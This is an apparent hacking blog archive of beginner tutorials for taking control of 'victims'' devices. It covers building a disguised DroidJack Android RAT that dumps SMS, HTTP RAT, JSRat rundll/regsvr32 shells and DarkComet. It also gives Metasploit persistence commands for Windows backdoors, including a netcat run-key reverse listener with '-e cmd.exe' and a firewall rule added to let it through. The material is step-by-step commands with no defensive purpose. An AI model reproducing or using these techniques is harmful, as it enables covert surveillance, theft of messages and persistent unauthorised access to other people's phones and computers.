Showing posts with label Keylogger and Trojan. Show all posts
Showing posts with label Keylogger and Trojan. Show all posts

Hack Any Android Phone with DroidJack (Beginner's Guide)

DroidJack is an android RAT which gives you the power to establish control over your victim's Android devices with an easy to use GUI and all the features you need to monitor them.


First of all download DroidJack  from http://droidjack.net/ .


Now execute the DroidJack which is a executable jar file . Then it will prompt you for login , so enter your username and password .


Now clicking on unlock button will open a GUI interface .


Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and enter the port no. of your system in the Port Number field and then click on Generate.


After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.


So now go to Devices and set the port field in the lower left corner to the same port with which you have generated the APK as in my case it is 1337 and then click on Reception  to start the listening mode.


Now send the apk RAT to your victim by any means .


After installing the app ,when the victim click on button we will get the android session. 



As you can see below the phone is  listed in Devices list.


Now right clicking on the mobile device will give a list of options which you can use.


Now for demo purpose i  have used SMS  Trekker and as you can see it has dumped all the SMS.

HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as a HTTP Tunnel, except it works in the reverse direction. These Trojans are comparatively more dangerous as these work on web and thus work almost everywhere where you can find internet.

Here, we would be working with HTTP RAT backdoor webserver by zombie


So download the above from internet and extract the tool. It would something like as shown in the pic below


Double click on the folder and click on the icon with httprat written next to it. Something like this pic pops up on the screen.


Click on create. This is what should pop out on screen.


An icon less application with httpserver must be created as in this pic:


Send this file to the victim via pendrive or any other means . Once the victim double clicks on the application, it will automatically sends a connection back to you. You just need to type the victim’s IP address on the browser. This is what will come on the screen


5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results .Then   run command:

persistence

run persistence –X –i 10 –p 443 –r 192.168.0.105

-X=connect back when the system boots
-i 10=try to connect back every 10 seconds
-p 443=reverse connection port
-r ip=reverse connection ip
After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.0.105

exploit


s4u_persistence


Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)
msf exploit (s4u_persistence)>set lport 443
msf exploit (s4u_persistence)>set trigger logon
msf exploit (s4u_persistence)>exploit

Now after successful backdoor creation, restart the victim pc you can see the previous meterpreter session is closed and then run command:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.137
exploit


VSS_PERSISTENCE
This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique and then background the session .Then run series of commands:

Now type use exploit/windows/local/vss_persistence
msf exploit (vss_persistence)>set runkey true
msf exploit (vss_persistence)>set schtask true
msf exploit (vss_persistence)>set rhost 192.168.222.137
msf exploit vss_persistence)>set session 2
msf exploit (vss_persistence)>exploit 

Now run exploit which will create a backdoor and will give a meterpreter session. 


Now background it and use the multi handler and also set the payload with commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4444
exploit

Now restart the victim system and the meterpreter session will die, and then run: exploit after restarting the system it will give a reverse meterpreter shell.


REGISTRY PERSISTENCE
This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in registry
First background the meterpreter session and then run commands:

Now type use exploit/windows/local/registry_persistence
msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)
msf exploit (registry_persistence)>set lport 4545
msf exploit (registry_persistence)>set startup system
msf exploit (registry_persistence)>set session 1
msf exploit (registry_persistence)>exploit


Now set up your system for reverse connection. Run the following commands on your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4545
exploit

Now restart the victim pc and your previous meterpreter session will die, so now run the exploit:
After restarting you will get the reverse meterpreter shell as you can see in my case


 NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32


Now set the registry value with the following command:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'


Now get the command shell with command:
Shell and then bypass the firewall on the victim system by adding firewall rules with shell command:
netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445


Now check whether the rules are added successfully with the command:
netsh firewall show portopening
As you can see the the firewall rule netcat is added successfully.


Now after restarting of the victim system , run the following command on the terminal:
nc  -nv 192.168.0.101 4445
Here 192.168.0.101 is the victim system you previously created backdoor and 4445 is the port you gave while setting the registry value.
After successful running the command you will get the command shell.

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administer  and help-desk personnel love the feature of accessing computers or laptops remotely but we also know that accessing a computer remotely requires that we have to install the same software on the remote computer as well as on our computer. But Atelier Web Remote Commander (AWRC) is a powerful tool for every geeks and system administrators because it can connect to other computers without installing any software or without any configuration on the remote computer.
Atelier Web Remote Commander (AWRC) Features:
·         Runs across firewalls.
·         Performs deep audits and all kinds of maintenance operations.
·         Does not leave traces on remote. It is absolutely safe.
·         Zero configuration simultaneous connections.
Now let’s see practical working of this tool.


Download Atelier Web Remote Commander from here  and install and open.


In Remote Host column type IP address of the computer or server, you want to get a remote desktop connection, after that give User Name and Password and click on Connect.

After few seconds, you can see that a desktop of a remote computer appears in front of you. Now you can see information of the remote system and access file of the remote computer.


Go to SysInfo tab, here you see all information related to remote computer like version of running OS, BIOS information, details of memory, etc.


In NetworkInfo section, you will get most interesting information about the remote system like routing table, running protocols, open ports, IP statistics, etc.


FileSystem tab will give you access to file system of a remote computer, where you access all files and data on all drives.


UserGroup section will give you details of all created accounts and its privileges and in which group that user account is connected.


If you want to chat or tell something to remote computer user you can also do that, simply start Chat window and type whatever you want to say and hit enter.


OUTPUT of remote victims computer.


Hack Remote Windows 10 PC using JSRat


Learning only one framework such as Metasploit, etc. has its own limitations. Todays’ ever developing cyber world required end to end knowledge of every tool and framework so that if you are cut off of one method, you have another to save yourself. That is the reason today through this article we are going to learn about JSRat.
Tables of content
·         Introduction
·         Downloading and installation
·         Access the webserver
·         Rundll attack
·         Regsvr32 attack
Introduction
As the name suggest this tool is developed in JavaScript. Numeral commands and controls of this framework can be used for multiple methods of attack and also, to hide malicious traffic. These attacks can be done in various formats. JSRat is developed by Casey Smith. He developed this framework as a prototype tool. It allows the payload to connect to listening server. 3gstudent is the security researcher who extended Casey's work and refined the tool. He developed it in PowerShell due which extra features are added. These features were created in python which allows the server to be both linux and windows friendly. The basic protocol used is HTTP for the server to work. Usage of both implementation, i.e. in python and PowerShell, are shown in this article.
Downloading and Installation
As this tool is user friendly, downloading and installation of this tool is very easy. You can download it from here. Once you copy the cloning code from the link provided then type the following command to download :
git clone https://github.com/Hood3dRob1n/JSRat-Py.git
Running the command presented above will download and install JSRat. Once it’s all done, use the following command to check the file.
cd JSRat-Py/
ls
Now, use the following command to start the framework :
./JSRat.py -I 192.168.1.107 -p 4444
In the above command we have specified IP of our own machine and port for the webserver to run.
As the server is up and running, it will show the various files it made as shown in the image below :
You can find these files by accessing the server from your or victim’s browser. If you look closely, there is a code given on the server. This code allows you to execute rundll attack.
Copy this code and paste it in the command prompt of the victims’ PC. As shown in the following image :
As soon as the command is executed you will have a session.
Now on the same server there is a regsvr32 file, which can also help us to get session.
Copy the file command and paste it in the run window.

Similar to rundll attack, after running the above command you will have your session.
Conclusion

As this framework returns HTTP shell using JavaScript. You can see that the two attacks that we have shown above exhibits that rundll and regsvr32 uses JavaScript code in command prompt and http shell to return while the coded is executed. As it works through the server developed in python; our malicious files doesn't get written on the disk, which is an advantage to us. This also increases possibility of being the stealthiest of the attacks. Another advantage is this file can avoid being killed. Therefore, this tools proves to be great without fail.

Hack Remote PC using DARKCOMET RAT with Metasploit

Download DarkcometRAT From here After downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe


First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)


In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist


In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal


Now save it on your desktop.


Again open DARKCOMET RAT and select listen to new port option


Now enter the port number used in the form above and click on Listen


Now hack victim’s PC using Metasploit How to Hack Remote PC
Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet
Upload /root/Desktop/updates.exe d:\\
Now type shell to get the command prompt of victim’s PC. And run uploaded exe file


Now you can get the session of victim’s PC. See the screenshot below:


Click on system info you can see the whole system information of victim’s PC